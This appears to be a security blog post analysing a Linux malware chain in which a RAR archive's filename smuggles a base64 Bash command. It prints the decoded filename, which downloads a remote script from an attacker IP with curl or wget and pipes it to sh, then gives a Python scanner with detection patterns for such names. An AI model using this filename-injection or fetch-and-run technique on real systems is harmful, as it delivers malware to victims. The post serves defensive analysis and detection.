
In this blog post, we’ll dissect a real-world, Linux-specific malware infection chain that starts with a spam email carrying a malicious RAR archive. The payload isn’t hidden inside the file content or a macro; it is encoded directly in the filename itself. Through clever use of shell command injection and base64-encoded Bash payloads, the attacker turns a simple file listing operation into an automatic malware execution trigger.
What’s more alarming is that this tactic bypasses many traditional defenses:
  • Antivirus engines don’t usually scan filenames
  • Static analysis tools might miss encoded command chains
  • Behavioral detection may not flag it unless filename execution occurs
Decoded filename:

```
ziliao2.pdf`{echo,(curl -fsSL -m180 http://47.98.194.60:443/slw||wget -T180 -q \
http://47.98.194.60:443/slw)|sh  }_{base64,-d}_bash`
```
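The defensive gap the post points out is that scanners look at file contents, not names. The following is an added example (not code from the original post or from the blog it links to) showing how an archive-listing triage step can close that gap: it flags filenames carrying shell command substitution, brace-expansion command words such as `{echo,...}`, pipes into a shell, and base64 decoders, and it decodes any `{echo,<base64>}` blob so an analyst can read the staged command without executing anything. The pattern names, the `triage_listing` function and the sample listing are assumptions of this example; the one decoded filename quoted from the post is reproduced as it appears above (line continuation joined), and the encoded sample is constructed around a harmless placeholder command.

```python
import base64
import re

# Added example: defender-side filename scanner for archive listings.
# Pattern names are this example's own labels, not from the original post.
SUSPICIOUS_PATTERNS = {
    "backtick_substitution": re.compile(r"`[^`]*`"),            # `...`
    "dollar_substitution": re.compile(r"\$\([^)]*\)"),           # $(...)
    "brace_comma_command": re.compile(r"\{[A-Za-z0-9_./-]+,[^{}]*\}"),  # {echo,...}
    "pipe_to_shell": re.compile(r"\|\s*(?:sh|bash|dash|zsh)\b"),  # | sh / | bash
    "base64_decode": re.compile(r"base64\s*[, ]\s*-d\b|base64\s*--decode"),
    "remote_fetch": re.compile(r"\b(?:curl|wget)\b"),
}

# A base64 blob handed to echo via brace expansion, e.g. {echo,SGVsbG8=}
B64_IN_ECHO = re.compile(r"\{echo,([A-Za-z0-9+/=]{8,})\}")


def scan_filename(name: str) -> list[str]:
    """Return the labels of every suspicious pattern present in a filename."""
    return [label for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(name)]


def decode_echo_payloads(name: str) -> list[str]:
    """Decode every {echo,<base64>} blob in the name so the staged command
    can be read by an analyst. Nothing is executed; invalid base64 is skipped."""
    decoded = []
    for blob in B64_IN_ECHO.findall(name):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return decoded


def triage_listing(names: list[str]) -> dict[str, dict]:
    """Map each suspicious entry of an archive listing to its findings.
    A non-empty result is a reason to quarantine the archive before any
    shell-interpolating tool (a listing script, a thumbnailer) touches it."""
    report = {}
    for name in names:
        hits = scan_filename(name)
        if hits:
            report[name] = {"patterns": hits, "decoded": decode_echo_payloads(name)}
    return report


# Decoded filename quoted from the post above (line continuation joined).
DECODED_FROM_POST = (
    "ziliao2.pdf`{echo,(curl -fsSL -m180 http://47.98.194.60:443/slw||wget -T180 -q "
    "http://47.98.194.60:443/slw)|sh  }_{base64,-d}_bash`"
)

# Constructed encoded sample: same shape as the attack name, but the base64
# wraps a harmless placeholder so the decode step can be demonstrated safely.
_PLACEHOLDER_CMD = "echo constructed-sample-only"
CONSTRUCTED_ENCODED = (
    "ziliao2.pdf`{echo,"
    + base64.b64encode(_PLACEHOLDER_CMD.encode()).decode()
    + "}|{base64,-d}|bash`"
)

# Constructed archive listing: one benign name plus the two samples above.
SAMPLE_LISTING = ["quarterly_report.pdf", DECODED_FROM_POST, CONSTRUCTED_ENCODED]


if __name__ == "__main__":
    for name, findings in triage_listing(SAMPLE_LISTING).items():
        print(repr(name))
        print("  patterns:", ", ".join(findings["patterns"]))
        for cmd in findings["decoded"]:
            print("  decoded :", cmd)
```

Run it as a script and only the two hostile entries are reported; the benign PDF produces no findings. The point of matching several independent features (substitution syntax, brace-comma words, shell pipes, decoders, fetch tools) is that a single hit already justifies quarantine, while the decode step gives the analyst the cleartext staged command for the incident record.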

wow.
I like to read about cybersecurity... Thanks for your post